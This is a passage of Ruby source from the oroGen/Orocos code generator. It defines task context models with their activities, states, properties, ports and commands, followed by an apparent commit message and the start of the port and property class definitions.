def all_#{attribute_name}; each_#{each_name}.to_a end
def self_#{attribute_name}; @#{attribute_name} end
def each_#{each_name}(only_self = false, &block)
if block_given?
if !only_self && superclass
superclass.each_#{each_name}(false, &block)
end
@#{attribute_name}.each(&block)
else
enum_for(:each_#{each_name}, only_self)
end
end
EOD
end
def to_s; "#<#<Orocos::Generation::TaskContext>: #{name}>" end
# Call to declare that this task model is not meant to run in
# practice
def abstract; @abstract = true; end
# True if this task model is only meant to declare an interface, and
# should not be deployed
def abstract?; @abstract end
# Declares that this task context is a subclass of the following
# TaskContext class. +task_context+ can either be a class name or a
# TaskContext instance. In both cases, it must be defined in the
# scope of the enclosing Component object -- i.e. either defined in
# it, or imported by a Component#using_task_library call.
def subclasses(task_context)
@superclass = component.find_task_context task_context
if !superclass
raise ArgumentError, "no such task context #{task_context}"
end
end
# Declares that this task context is also a subclass of the
# following class. +name+ does not have to be a task context class.
def implements(name, include_file = nil)
@implemented_classes << [name, include_file]
end
# True if the task context implements a parent class which matches
# +name+. +name+ can either be a string or a regular expression.
def implements?(name)
class_name == name ||
(superclass && superclass.implements?(name)) ||
@implemented_classes.any? { |class_name, _| name === class_name }
end
##
# :method: required_activity?
#
# True if the current value of default_activity is actually
# required by the task context implementation
attr_predicate :required_activity?, true
##
# :method: required_activity
# :call-seq:
# required_activity 'activity_type', *args
#
# The kind of activity that must be used for this task context. This
# is the name of the corresponding method on the deployment objects.
# See ACTIVITY_TYPES for the list of known activity types.
#
# See also #default_activity
dsl_attribute :required_activity do |type, *args|
if respond_to?(type.to_sym)
send(type.to_sym)
else
default_activity type, *args
end
self.required_activity = true
end
##
# :method: default_activity
# :call-seq:
# default_activity 'avtivity_type', *args
#
# The kind of activity that should be used by default. This is the
# name of the corresponding method on the deployment objects
# (:periodic, :aperiodic, :slave, :irq_driven, :fd_driven)
#
# This is a default value, i.e. the use of such an activity
# is not mandatory. If #required_activity is set to true, then
# this activity is the only kind of activity that can be used
# with this task context.
#
# See also #required_activity
dsl_attribute :default_activity do |type, *args|
if required_activity? && @default_activity
raise ArgumentError, "the #{default_activity[0]} activity is required, you cannot change it"
end
type = type.to_sym
if !ACTIVITY_TYPES.has_key?(type)
raise ArgumentError, "#{type} is not a valid activity type"
end
[type, *args]
end
# True if this task context is defined by one of our dependencies.
attr_predicate :external_definition?, true
# The name of the header file containing the C++ code which defines
# this task context
def header_file
if external_definition?
library_name, name = self.name.split("::")
"#{library_name.downcase}/#{name}.hpp"
else
"#{component.name.downcase}/#{basename}.hpp"
end
end
# Returns the name without an eventual library name
def basename
library_name, name = self.name.split("::")
name || library_name
end
# True if we are generating for Linux
def linux?; component.linux? end
# True if we are generating for Xenomai
def xenomai?; component.xenomai? end
def class_name
name
end
# Create a new task context in the given component and with
# the given name. If a block is given, it is evaluated
# in the context of the newly created TaskContext object.
#
# TaskContext objects should not be created directly. You should
# use Component#task_context for that.
def initialize(component, name)
if name == component.name
raise ArgumentError, "tasks and projects must not have the same name"
elsif name !~ /^(\w+::)*\w+$/
raise ArgumentError, "task names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
end
@component = component
@superclass = component.default_task_superclass
@implemented_classes = []
@name = name
# This is an array, as we don't want to have it reordered
# unnecessarily
@states = Array.new
default_activity 'triggered'
@properties = Array.new
@methods = Array.new
@commands = Array.new
@ports = Array.new
@dynamic_ports = Array.new
@event_ports = Array.new
@initial_state = 'Stopped'
@fixed_initial_state = false
@needs_configuration = false
end
def pretty_print_interface(pp, name, set)
if set.empty?
pp.text "No #{name.downcase}"
else
pp.text name
pp.nest(2) do
set.each do |element|
pp.breakable
element.pretty_print(pp)
end
end
end
pp.breakable
end
def pretty_print(pp)
pp.text "------- #{name} ------"
pp.breakable
ports = each_port.to_a + each_dynamic_port.to_a
pretty_print_interface(pp, "Ports", ports)
pretty_print_interface(pp, "Properties", each_property.to_a)
pretty_print_interface(pp, "Methods", each_method.to_a)
pretty_print_interface(pp, "Commands", each_command.to_a)
end
# Returns the object in +set_name+ for which #name returns +name+,
# or ArgumentError if there is none
def get_object(set_name, name)
set = send("all_#{set_name}")
obj = set.find { |o| o.name == name }
if !obj
raise ArgumentError, "there is no #{name} in #{set_name}"
end
obj
end
# Raises ArgumentError if an object named +name+ is already present
# in the set attribute +set_name+.
#
# This is an internal helper method
def check_uniqueness(set_name, name) # :nodoc:
# Check if that name is a method name in orocos.rb as well ...
# To warn about name clashes
if @orocos_rb.nil?
begin
require 'orocos'
@orocos_rb = true
rescue LoadError
@orocos_rb = false
end
end
if name.to_str != 'state' && @orocos_rb && !component.kind_of?(ImportedProject)
if Orocos::TaskContext.instance_methods.find { |n| n.to_s == name.to_str }
STDERR.puts "WARN: #{name} is a method name used in orocos.rb"
STDERR.puts "WARN: if you keep that name, you will not be able to use shortcut access in orocos.rb"
STDERR.puts "WARN: for instance, for a property, you will have to do"
STDERR.puts "WARN: my_task.property('#{name}').write(new_value)"
STDERR.puts "WARN: instead of the shorter and clearer"
STDERR.puts "WARN: my_task.#{name} = new_value"
end
end
set = send("all_#{set_name}")
if set.find { |o| o.name == name }
raise ArgumentError, "there is already a #{name} in #{set_name}"
end
end
private :check_uniqueness
# Add in +self+ the ports of +other_model+ that don't exist.
#
# Raises ArgumentError if +other_model+ has ports whose name is used
# in +self+, but for which the definition is different.
def merge_ports_from(other_model)
other_model.each_port do |p|
self_port = other_model.port(p.name)
if self_port
if (self_port.class != p.class || self_port.type != p.type)
raise ArgumentError, "cannot merge as the output port #{self_port.name} have different meanings"
end
else
@ports << p
end
end
end
# If true, then the initial state of this class cannot be specified.
# For orogen-declared tasks, it is the same as
# #needs_configuration?. This mechanism is here for classes that
# have not been generated by orogen and either have a no way to
# specify the initial state, or a non-standard one.
def fixed_initial_state?; @fixed_initial_state || needs_configuration? || (superclass.fixed_initial_state? if superclass) end
# Declares that the initial state of this class cannot be specified.
# For orogen-declared tasks, it is the same as
# #needs_configuration?. This mechanism is here for classes that
# have not been generated by orogen and either have a no way to
# specify the initial state, or a non-standard one.
def fixed_initial_state; @fixed_initial_state = true end
# If true, the task context will start in the PreOperational state,
# and will not be able to run until configure() has been called and
# returned true.
#
# When subclassing, it is NOT possible to have a subclass starting
# in the Stopped state while its superclass starts from
# PreOperational.
def needs_configuration?; @needs_configuration || (superclass.needs_configuration? if superclass) end
# Declares that this task needs to be configured before it is
# started (i.e. its initial state will be PreOperational instead of
# Stopped).
#
# If #fixed_initial_state? returns true, then this method raises
# ArgumentError. This is done so that it is possible to declare
# that some task contexts's implementation require the initial
# state to be either PreOperational or Stopped.
def needs_configuration
if superclass && superclass.fixed_initial_state?
raise ArgumentError, "cannot change the start state of this task context: the superclass #{superclass.name} does not allow it"
elsif fixed_initial_state? && !needs_configuration?
raise ArgumentError, "cannot change the start state of this task context: #fixed_initial_state has been specified for it"
end
@needs_configuration = true
end
# Create a new property with the given name, type and default value
# for this task. This returns the Property instance representing
# the new property, whose methods can be used to configure the
# property further. +type+ is the type name for that attribute. It
# can be either in Typelib notation (/std/string) or in C++
# notation (std::string). This type must be defined either by the
# component's own toolkit, or by toolkits imported with
# Component#load_toolkit.
#
# The generated task context will have a <tt>_[property name]</tt>
# attribute of class RTT::Property<type>.
#
# For instance, the following definition
# property('device_name', '/std/string/, '').
# doc 'the device name to connect to'
#
# Will generate a task context with a <tt>_device_name</tt>
# attribute of type RTT::Property<std::string>.
def property(name, type, default_value = nil)
check_uniqueness :properties, name
type = component.find_type(type)
@properties << Property.new(self, name, type, default_value)
@properties.last
end
# Asks orogen to implement the extended state support interface in
# the Base class. This adds:
# * a 'state' output port in which the current task's state is written
# * an enumeration type named CLASS_NAME_STATES in which one value
# is defined for each states
#
# Note that, for all of this to work, it is actually required that
# all the hooks overloaded in the task's class call their parent in
# the call chain.
def extended_state_support
state_port = each_port.find { |p| p.name == "state" }
if state_port
if state_port.kind_of?(InputPort)
raise ArgumentError,
"there is already an input port called 'state', cannot enable extended state support"
elsif state_port.type_name != "/int"
raise ArgumentError,
"there is already an output port called 'state', but it is not of type 'int' (found #{state_port.typename}"
end
else
output_port 'state', '/int'
end
# Force toolkit generation. The toolkit code will take care of
# generating the state enumeration type for us
component.toolkit(true)
@extended_state_support = true
end
# True if the extended state support is enabled
def extended_state_support?
@extended_state_support || (superclass.extended_state_support? if superclass)
end
# Returns true if the given state name is already used
def state?(name)
state_kind(name) || (superclass.state?(name.to_s) if superclass)
end
STATE_TYPES = [ :toplevel, :runtime, :error, :fatal ]
# Internal method for state definition
def define_state(name, type) # :nodoc:
name = name.to_s
type = type.to_sym
if !STATE_TYPES.include?(type)
raise ArgumentError, "unknown state type #{type.inspect}"
end
if !extended_state_support?
extended_state_support
end
if kind = state_kind(name.to_s)
if kind != type
raise ArgumentError, "state #{name} is already defined as #{kind}, cannot overload into #{type}"
end
else
@states << [name, type]
@states = @states.sort_by { |n, _| n }
end
end
# Returns what kind of state +name+ is
def state_kind(name) # :nodoc:
if s = each_state.find { |n, t| n == name }
s[1]
end
end
# Returns the type name for the state enumeration
def state_type_name # :nodoc:
"#{basename}_STATES"
end
# Returns the C++ value name for the given state when defined
# globally
def state_global_value_name(state_name, state_type) # :nodoc:
"#{basename}_#{state_name.upcase}"
end
# Returns the C++ value name for the given state when defined in the
# associated class scope.
def state_local_value_name(state_name, state_type) # :nodoc:
state_name.upcase
end
##
# :method: each_runtime_state
#
# Enumerates all the runtime states
#
# See also #each_error_state, #each_fatal_state and #each_state
##
# :method: each_error_state
#
# Enumerates all error states defined for this task context
#
# See also #each_runtime_state, #each_fatal_state, and #each_state
##
# :method: each_fatal_state
#
# Enumerates all error states defined for this task context
#
# See also #each_runtime_state, #each_error_state and #each_state
STATE_TYPES.each do |type|
class_eval <<-EOD
def each_#{type}_state
if block_given?
each_state do |name, type|
yield(name) if type == :#{type}
end
else
enum_for(:each_#{type}_state)
end
end
EOD
end
# Enumerates each state defined on this task context.
def each_state(&block)
if block_given?
superclass.each_state(&block) if superclass
@states.each(&block)
else
enum_for(:each_state)
end
end
# call-seq:
# states -> set of states
#
# Declares a toplevel state. It should be used only to declare RTT's
# TaskContext states.
def states(*state_names) # :nodoc:
if state_names.empty?
return @states
end
state_names.each do |name|
define_state(name, :toplevel)
end
end
# Declares a certain number of runtime states
#
# This method will do nothing if it defines a state that is already
# defined by one of the superclasses.
#
# See #error_states, #each_state, #each_runtime_state
def runtime_states(*state_names)
state_names.each do |name|
define_state(name, :runtime)
end
end
# Declares a certain number of runtime error states
#
# This method will do nothing if it defines a state that is already
# defined by one of the superclasses.
#
# See #runtime_states, #each_state, #each_error_state
def error_states(*state_names)
state_names.each do |name|
define_state(name, :error)
end
end
# Declares a certain number of fatal error states
#
# This method will do nothing if it defines a state that is already
# defined by one of the superclasses.
#
# See #runtime_states, #error_states, #each_state, #each_error_state
def fatal_states(*state_names)
state_names.each do |name|
define_state(name, :fatal)
end
end
# This method is an easier way use boost::shared_ptr in a task
# context interface. For instance, instead of writing
#
# input_port 'image', '/boost/shared_ptr</Image>'
#
# you can write
#
# input_port 'image', shared_ptr('/Image')
#
# Additionally, this method makes sure that the corresponding type
# is actually defined on the project's toolkit.
def shared_ptr(name)
base_type = component.find_type(name)
full_name = "/boost/shared_ptr<#{base_type.name}>"
begin
component.find_type(full_name)
rescue Typelib::NotFound
component.toolkit { shared_ptr(name) }
component.find_type(full_name)
end
end
# This method is an easier way use boost::shared_ptr in a task
# context interface. For instance, instead of writing
#
# input_port 'image', '/RTT/ReadOnlyPointer</Image>'
#
# you can write
#
# input_port 'image', ro_ptr('/Image')
#
# Additionally, this method makes sure that the corresponding type
# is actually defined on the project's toolkit.
def ro_ptr(name)
base_type =
begin
component.find_type(name)
rescue Typelib::NotFound
raise ArgumentError, "type #{name} is not available"
end
full_name = "/RTT/ReadOnlyPointer<#{base_type.name}>"
begin
component.find_type(full_name)
rescue Typelib::NotFound
component.toolkit { ro_ptr(name) }
component.find_type(full_name)
end
end
# Create a new method with the given name. Use the returned Method
# object to configure the method further.
#
# In Orocos, a method is a synchronous method call to a task context:
# the caller will block until the method's procedure is called
def method(name)
@methods << Method.new(self, name)
@methods.last
end
# The set of commands that have been added at this level of the
# class hierarchy.
def new_commands
super_names = superclass.all_commands.map(&:name).to_set
@commands.find_all do |t|
!super_names.include?(t)
end
end
# The set of commands that are overloaded in this task class
def overloaded_commands
super_names = superclass.all_commands.map(&:name).to_set
@commands.find_all do |t|
!super_names.include?(t)
end
end
# Create a new command with the given name. Use the returned
# Command object to configure the method further. In Orocos, a
# command is an asynchronous method call to a task context.
#
# The generated class will have a <tt>_[command name]</tt>
# attribute of class RTT::Command<>. For instance,
#
# command('my_command').
# doc 'description of command'
#
# will generate an attribute <tt>_my_command</tt> of type
# RTT::Command. The
def command(name)
@commands << Command.new(self, name)
@commands.last
end
##
# :method: each_dynamic_port
# :call-seq:
# each_dynamic_port(only_self = false) { |port| }
#
# Yields all dynamic ports that are defined on this task context.
##
# :method: all_dynamic_ports
# :call-seq:
# all_dynamic_ports -> set_of_ports
#
# Returns the set of all dynamic ports that are defined on this task
# context
##
# :method: self_dynamic_ports
# :call-seq:
# self_dynamic_ports -> set_of_ports
#
# Returns the set of dynamic ports that are added at this level of
# the model hierarchy. I.e. ports that are defined on this task
# context, but not on its parent models.
enumerate_inherited_set("dynamic_port", "dynamic_ports")
##
# :method: each_port
# :call-seq:
# each_port(only_self = false) { |port| }
#
# Yields all static ports that are defined on this task context.
##
# :method: all_ports
# :call-seq:
# all_ports -> set_of_ports
#
# Returns the set of all static ports that are defined on this task
# context
##
# :method: self_ports
# :call-seq:
# self_ports -> set_of_ports
#
# Returns the set of static ports that are added at this level of
# the model hierarchy. I.e. ports that are defined on this task
# context, but not on its parent models.
enumerate_inherited_set("port", "ports")
##
# :method: each_property
# :call-seq:
# each_property(only_self = false) { |property| }
#
# Yields all properties that are defined on this task context.
##
# :method: all_properties
# :call-seq:
# all_properties -> set_of_properties
#
# Returns the set of all properties that are defined on this task
# context
##
# :method: self_properties
# :call-seq:
# self_properties -> set_of_properties
#
# Returns the set of properties that are added at this level of the
# model hierarchy. I.e. properties that are defined on this task
# context, but not on its parent models.
enumerate_inherited_set("property", "properties")
##
# :method: each_command
# :call-seq:
# each_command(only_self = false) { |command| }
#
# Yields all commands that are defined on this task context.
##
# :method: all_commands
#
# :call-seq:
# all_commands -> set_of_commands
#
# Returns the set of all commands that are defined on this task
# context
##
# :method: self_commands
# :call-seq:
# self_commands -> set_of_commands
#
# Returns the set of commands that are added at this level of the
# model hierarchy. I.e. commands that are either newly defined on
# this task context, or overload commands from the parent models.
enumerate_inherited_set("command", "commands")
##
# :method: each_method
# :call-seq:
# each_method(only_self = false) { |method| ... }
#
# Yields all methods that are defined on this task context.
##
# :method: all_methods
# :call-seq:
# all_methods -> set_of_methods
#
# Returns the set of all methods that are defined on this task
# context
##
# :method: self_methods
# :call-seq:
# self_methods -> set_of_methods
#
# Returns the set of methods that are added at this level of the
# model hierarchy. I.e. methods that are either newly defined on
# this task context, or overload methods from the parent models.
enumerate_inherited_set("method", "methods")
# Methods that are added by this task context (i.e. methods that are
# defined there but are not present in the superclass)
def new_methods
super_names = superclass.all_methods.map(&:name).to_set
@methods.find_all do |t|
!super_names.include?(t)
end
end
# call-seq:
# output_port 'name', '/type'
#
# Add a new write port with the given name and type, and returns the
# corresponding OutputPort object.
#
# See also #input_port
def output_port(name, type)
check_uniqueness(:ports, name)
@ports << OutputPort.new(self, name, type)
@ports.last
rescue Typelib::NotFound
raise ConfigError, "type #{type} is not declared"
end
# Enumerates the output ports available on this task context. If no
# block is given, returns the corresponding enumerator object.
def each_output_port(&block)
each_port.
find_all { |p| p.kind_of?(OutputPort) }.
each(&block)
end
# Returns the port named +name+ or raises ArgumentError if no such
# port exists
def port(name)
if p = each_port.find { |p| p.name == name }
p
else raise ArgumentError, "#{self} has no port named '#{name}'"
end
end
# call-seq:
# input_port 'name', '/type'
#
# Add a new write port with the given name and type, and returns the
# corresponding InputPort object.
#
# See also #output_port
def input_port(name, type)
check_uniqueness(:ports, name)
@ports << InputPort.new(self, name, type)
@ports.last
rescue Typelib::NotFound
raise ConfigError, "type #{type} is not declared"
end
# call-seq:
# dynamic_input_port name_regex, typename
#
# Declares that a port whose name matches name_regex can be declared
# at runtime, with the type. This is not used by orogen himself, but
# can be used by potential users of the orogen specification.
def dynamic_input_port(name, type)
dynamic_ports << DynamicInputPort.new(self, name, type)
dynamic_ports.last
end
# call-seq:
# dynamic_output_port name_regex, typename
#
# Declares that a port whose name matches name_regex can be declared
# at runtime, with the type. This is not used by orogen himself, but
# can be used by potential users of the orogen specification.
def dynamic_output_port(name, type)
dynamic_ports << DynamicOutputPort.new(self, name, type)
dynamic_ports.last
end
# Returns true if there is a dynamic port definition that matches
# the given name and type pair.
#
# If +type+ is nil, the type is ignored in the matching.
def dynamic_port?(name, type)
dynamic_input_port?(name, type) || dynamic_output_port?(name, type)
end
# Returns the set of dynamic input port definitions that match the
# given name and type pair. If +type+ is nil, the type is ignored in
# the matching.
def find_dynamic_input_ports(name, type)
dynamic_ports.find_all { |p| p.kind_of?(InputPort) && (!type || p.type == component.find_type(type)) && p.name === name }
end
# Returns true if there is an input port definition that match the
# given name and type pair. If +type+ is nil, the type is ignored in
# the matching.
def dynamic_input_port?(name, type = nil)
!find_dynamic_input_ports(name, type).empty?
end
# Returns the set of dynamic output port definitions that match the
# given name and type pair. If +type+ is nil, the type is ignored in
# the matching.
def find_dynamic_output_ports(name, type)
dynamic_ports.find_all { |p| p.kind_of?(OutputPort) && (!type || p.type == component.find_type(type)) && p.name === name }
end
# Returns true if an output port of the given name and type could be
# created at runtime.
def dynamic_output_port?(name, type = nil)
!find_dynamic_output_ports(name, type).empty?
end
# Enumerates the input ports available on this task context. If no
# block is given, returns the corresponding enumerator object.
def each_input_port(&block)
each_port.
find_all { |p| p.kind_of?(InputPort) }.
each(&block)
end
# A set of ports that will trigger this task when they get updated.
attr_reader :event_ports
# Declares that this task context is designed to be woken up when
# new data is available on one of the given ports (or all already
# defined ports if no names are given).
def port_driven(*names)
names = names.map { |n| n.to_s }
relevant_ports = if names.empty? then all_ports.find_all { |p| p.kind_of?(InputPort) }
else
names.map do |n|
obj = get_object(:ports, n)
if !obj.kind_of?(InputPort)
raise ArgumentError, "only read ports can be used as triggers for a task context"
end
obj
end
end
@event_ports.concat(relevant_ports)
end
# Declares that this task context is designed to be woken up when
# new data is available on a I/O file descriptor. The resulting task
# must also use the fd_driven activity, which is done by default.
#
# The only thing you have to do in the implementation is therefore
#
# task = task("MyDFDrivenTask").
# start
#
# To configure the activity, you will have to implement the
# getFileDescriptor() method that is generated in the target class.
def fd_driven
default_activity "fd_driven"
needs_configuration
end
# True if this task context's default activity is a FD-driven activity
def fd_driven?
default_activity.first == :fd_driven
end
# The set of task libraries from which we depend on, because of our
# superclasses and implements
def used_task_libraries
component.used_task_libraries.find_all do |tasklib|
tasklib.tasks.any? do |task|
task.component == tasklib && implements?(task.name)
end
end
end
# Returns the set of types that are used to define this task
# context, as an array of subclasses of Typelib::Type.
def interface_types
(all_properties + all_methods + all_commands + all_ports).
map { |obj| obj.used_types }.
flatten.to_value_set.to_a
end
# Returns the set of toolkits that define the types used in this
# task's interface. They are required at compile and link time
# because of the explicit instanciation of interface templates
# (ports, ...)
def used_toolkits
types = interface_types
component.used_toolkits.find_all do |tk|
types.any? do |type|
tk.includes?(type.name)
end
end.to_value_set
end
# Generate the code files for this task. This builds to classes:
#
# * a #{task.name}Base class in .orogen/tasks/#{task.name}Base.{cpp,hpp}
# which is the automatically generated part of the task.
# * a #{task.name} class in tasks/#{task.name}.{cpp,hpp} which is
# the user-provided part of the task. This class is a public
# subclass of the Base class.
def generate
return if external_definition?
# Make this task be available in templates as 'task'
task = self
base_code_cpp = Generation.render_template 'tasks', 'TaskBase.cpp', binding
base_code_hpp = Generation.render_template 'tasks', 'TaskBase.hpp', binding
Generation.save_automatic "tasks", "#{basename}Base.cpp", base_code_cpp
Generation.save_automatic "tasks", "#{basename}Base.hpp", base_code_hpp
code_cpp = Generation.render_template "tasks", "Task.cpp", binding
code_hpp = Generation.render_template "tasks", "Task.hpp", binding
Generation.save_user "tasks", "#{basename}.cpp", code_cpp
Generation.save_user "tasks", "#{basename}.hpp", code_hpp
fake_install_dir = File.join(component.base_dir, AUTOMATIC_AREA_NAME, component.name)
FileUtils.mkdir_p fake_install_dir
FileUtils.ln_sf File.join(component.base_dir, "tasks", "#{basename}.hpp"),
File.join(fake_install_dir, "#{basename}.hpp")
FileUtils.ln_sf File.join(component.base_dir, AUTOMATIC_AREA_NAME, "tasks", "#{basename}Base.hpp"),
File.join(fake_install_dir, "#{basename}Base.hpp")
self
end
# Generate a graphviz fragment to represent this task
def to_dot
html_escape = lambda { |s| s.gsub(/</, "<").gsub(/>/, ">") }
html_table = lambda do |title, lines|
label = "<TABLE BORDER=\"0\" CELLBORDER=\"1\" CELLSPACING=\"0\">\n"
label << " <TR><TD>#{title}</TD></TR>\n"
label << " <TR><TD>\n"
label << lines.join("<BR/>\n")
label << " </TD></TR>\n"
label << "</TABLE>"
end
result = ""
result << " node [shape=none,margin=0,height=.1];"
label = ""
label << "<TABLE BORDER=\"0\" CELLBORDER=\"0\" CELLSPACING=\"0\">\n"
label << " <TR><TD>#{name}</TD></TR>"
properties = all_properties.
map { |p| "#{p.name} [#{html_escape[p.type_name]}]" }
if !properties.empty?
label << " <TR><TD>#{html_table["Properties", properties]}</TD></TR>"
end
input_ports = all_ports.
find_all { |p| p.kind_of?(InputPort) }.
map { |p| "#{p.name} [#{html_escape[p.type_name]}]" }
if !input_ports.empty?
label << " <TR><TD>#{html_table["Input ports", input_ports]}</TD></TR>"
end
output_ports =all_ports.
find_all { |p| p.kind_of?(OutputPort) }.
map { |p| "#{p.name} [#{html_escape[p.type_name]}]" }
if !output_ports.empty?
label << " <TR><TD>#{html_table["Output ports", output_ports]}</TD></TR>"
end
label << "</TABLE>"
result << " t#{object_id} [label=<#{label}>]"
result
end
end
end
end
fix #merge_ports_from
require 'utilrb/module/attr_predicate'
require 'utilrb/value_set'
module Orocos
def self.validate_toplevel_type(type)
if type < Typelib::ArrayType
raise ArgumentError, "array types can be used only in a structure"
elsif type < Typelib::NumericType && !Typelib::Registry.base_rtt_type?(type)
raise ArgumentError, "#{type.name} cannot be used as a toplevel type"
end
end
module Generation
ACTIVITY_TYPES = {
:fd_driven => 'FileDescriptorActivity',
:irq_driven => 'IRQActivity',
:slave => 'SlaveActivity',
:periodic => 'PeriodicActivity',
:triggered => 'NonPeriodicActivity',
:sequential => 'SequentialActivity'
}
class Property
# The task on which this property is attached
attr_reader :task
# The property name
attr_reader :name
# The property type, as a Typelib::Type object from the underlying
# component's type registry
attr_reader :type
# The name of the type this property is using, for consistency with
# the +type+ attribute
def type_name; type.name end
def used_types; [type] end
# The property's default value
attr_reader :default_value
# The property default value, formatted for as a C++ value
def cxx_default_value
if type < Typelib::EnumType
type.namespace('::') + default_value.to_s
else
default_value.inspect
end
end
# Create a new property with the given name, type and default value
def initialize(task, name, type, default_value)
name = name.to_s
if name !~ /^\w+$/
raise ArgumentError, "property names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
end
type = task.component.find_type(type)
Orocos.validate_toplevel_type(type)
@name, @type, @default_value = name, type, default_value
end
def pretty_print(pp)
pp.text "#{name}:#{type.name}"
if doc
pp.text ": #{doc}"
end
end
# call-seq:
# doc new_doc -> self
# doc -> current_doc
#
# Gets/sets a string describing this object
dsl_attribute(:doc) { |value| value.to_s }
end
# Generic representation of ports. The actual ports are either
# instance of InputPort or OutputPort
class Port
# The port task
attr_reader :task
# The port name
attr_reader :name
# The port type
attr_reader :type
# The port type name
def type_name; type.name end
def used_types; [type] end
# True if the component supports only static connections on this
# port, and false otherwise
#
# See #static for more details.
def static?; !!@static end
# Declares that this port can be connected/disconnected only when
# the component is in a non-running state.
#
# The default is that the port is dynamic, i.e. can be
# connected/disconnected regardless of the component's state.
#
# See also #dynamic
def static; @static = true end
# Declares that this port can be connected/disconnected while the
# component is running. It is the opposite of #static.
#
# This is the default
def dynamic; @static = false end
def pretty_print(pp)
pp.text "[#{self.kind_of?(InputPort) ? "in" : "out"}]#{name}:#{type_name}"
end
def initialize(task, name, type)
if !name.kind_of?(Regexp)
name = name.to_s
if name !~ /^\w+$/
raise ArgumentError, "port names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
end
end
type = task.component.find_type(type)
Orocos.validate_toplevel_type(type)
if type.name == "/std/vector<double>"
Orocos::Generation.warn "#{type.name} is used as the port type for #{name}, logging it will not be possible"
end
@task, @name, @type = task, name, type
end
# call-seq:
# doc new_doc -> self
# doc -> current_doc
#
# Gets/sets a string describing this object
dsl_attribute(:doc) { |value| value.to_s }
end
# Specification for an output port
class OutputPort < Port
def initialize(*args)
super
@sample_size = 1
@period = 1
@burst_size = nil
@burst_period = nil
@port_triggers = Set.new
end
# Returns the name of the Orocos class for this port (i.e. one of
# ReadDataPort, WriteDataPort, DataPort, ReadBufferPort, ...)
def orocos_class; "RTT::OutputPort" end
attr_reader :burst_size
attr_reader :burst_period
# call-seq:
# sample_size new_size -> self
# sample_size -> size
#
# Sets and gets the sample size, i.e. how many data samples are
# pushed at once to this port.
dsl_attribute(:sample_size) { |value| Integer(value) }
# call-seq:
# period new_period -> self
# period -> current_period
#
# Sets the period for this output port, in cycles. The port period
# should be the minimal amount of execution cycles (calls to
# updateHook) between two updates of this port.
#
# See #sample_size and #burst for other parameters describing the
# behaviour of this port.
#
# The default is one.
dsl_attribute(:period) { |value| Integer(value) }
# call-seq:
# burst count, period -> self
#
# Declares that a burst of data can occasionally be written to this
# port. +count+ is the maximal number of samples that are pushed to
# this port at once, and +period+ how often this burst can happen.
#
# If the perid is set to 0, then it is assumed that the bursts
# happen 'every once in a while', i.e. that it can be assumed that
# the event is rare enough.
#
# The default is no burst
def burst(size, period = 1)
@burst_size = Integer(size)
@burst_period = Integer(period)
self
end
# The set of input ports that will cause a write on this output
attr_reader :port_triggers
# call-seq:
# triggered_on input_port_name, input_port_name, ...
#
# Declares that this port will be written whenever a sample is
# received on the given input ports. The default is to consider that
# the port is written whenever updateHook() is called.
#
# You may want to call #triggered_on_update if the port will be
# written for each call to updateHook too.
def triggered_on(*input_ports)
@port_triggers |= input_ports.to_set.map { |name| task.port(name) }
self
end
# call-seq:
# triggered_on_update
#
# Declares that this port will be written for each call of the
# updateHook(). It is the default if #triggered_on has not been
# called.
def triggered_on_update
@triggered_on_update = true
self
end
# True if the port will be written for the calls to updateHook()
# that are triggered by the activity.
#
# See #triggered_on_update and #triggered_on
def triggered_on_update?
if !@port_triggers.empty?
!!@triggered_on_update
else
true
end
end
end
# Specification for an input port
class InputPort < Port
# Returns the name of the Orocos class for this port (i.e. one of
# ReadDataPort, WriteDataPort, DataPort, ReadBufferPort, ...)
def orocos_class; "RTT::InputPort" end
attr_reader :required_connection_type
def initialize(*args)
super
@required_connection_type = :data
end
# True if connections to this port must use a buffered.
# In general, it means that the task's code check the return value
# of read(), as in
#
# if (_input.read(value))
# {
# // data is available, do something
# }
def needs_buffered_connection; @required_connection_type = :buffer; self end
# True if connections to this port must use a data policy.
#
# This should not be useful in general
def needs_data_connection; @required_connection_type = :data; self end
# Returns true if the component requires connections to this port to
# be reliable (i.e. non-lossy).
#
# See #needs_reliable_policy for more information
def needs_reliable_connection?; @needs_reliable_connection end
# Declares that the components requires a non-lossy policy
#
# This is different from #requires_buffered_connection as a data
# policy could be used if the period of the connection's source is
# much longer than the period of the connection's end (for
# instance).
def needs_reliable_connection; @needs_reliable_connection = true; self end
end
module DynamicPort
def instanciate(name)
m = dup
m.instance_variable_set :@name, name
m
end
def pretty_print(pp)
pp.text "[dyn,#{self.class < InputPort ? "in" : "out"}]#{name}:#{type_name}"
end
end
# Specification for a dynamic output port.
#
# Dynamic ports are not statically present, but will be created at
# runtime. They are added by TaskContext#dynamic_output_port.
class DynamicOutputPort < OutputPort
include DynamicPort
end
# Specification for a dynamic input port.
#
# Dynamic ports are not statically present, but will be created at
# runtime. They are added by TaskContext#dynamic_input_port.
class DynamicInputPort < InputPort
include DynamicPort
end
# Base class for methods and commands
class Callable
# The TaskContext instance this method is part of
attr_reader :task
# The method name
attr_reader :name
def initialize(task, name)
name = name.to_s
if name !~ /^\w+$/
raise ArgumentError, "#{self.class.name.downcase} names need to be valid C++ identifiers, i.e. contain only alphanumeric characters and _ (got #{name})"
end
@task = task
@name = name
@arguments = []
end
# call-seq:
# doc new_doc -> self
# doc -> current_doc
#
# Gets/sets a string describing this object
dsl_attribute(:doc) { |value| value.to_s }
# The set of arguments of this method, as an array of [name, type,
# doc] elements. The +type+ objects are Typelib::Type instances.
#
# See #argument
attr_reader :arguments
# Defines the next argument of this method. +name+ is the argument
# name and +type+ is either the type name as a string, or a
# Typelib::Type object. In both cases, the required type must be
# defined in the component, either because it is part of its own
# toolkit or because it has been imported by a
# Component#load_toolkit call.
#
# Note that Orocos::RTT does not support having more than 4
# arguments for a method, and trying that will therefore raise an
# error
def argument(name, type, doc = "")
if arguments.size == 4
raise ArgumentError, "Orocos does not support having more than 4 arguments for a method"
end
type = task.component.find_type(type)
Orocos.validate_toplevel_type(type)
arguments << [name, type, doc]
self
end
# Returns the set of types that this method/command uses, as a
# ValueSet of Typelib::Type classes.
def used_types
arguments.map { |_, t, _| t }
end
# Returns the argument part of the C++ signature for this callable
def argument_signature(with_names = true)
arglist = arguments.map do |name, type, doc|
arg = type.full_name('::', true)
if !(type < Typelib::NumericType)
arg += " const &"
end
if with_names then "#{arg} #{name}"
else arg
end
end
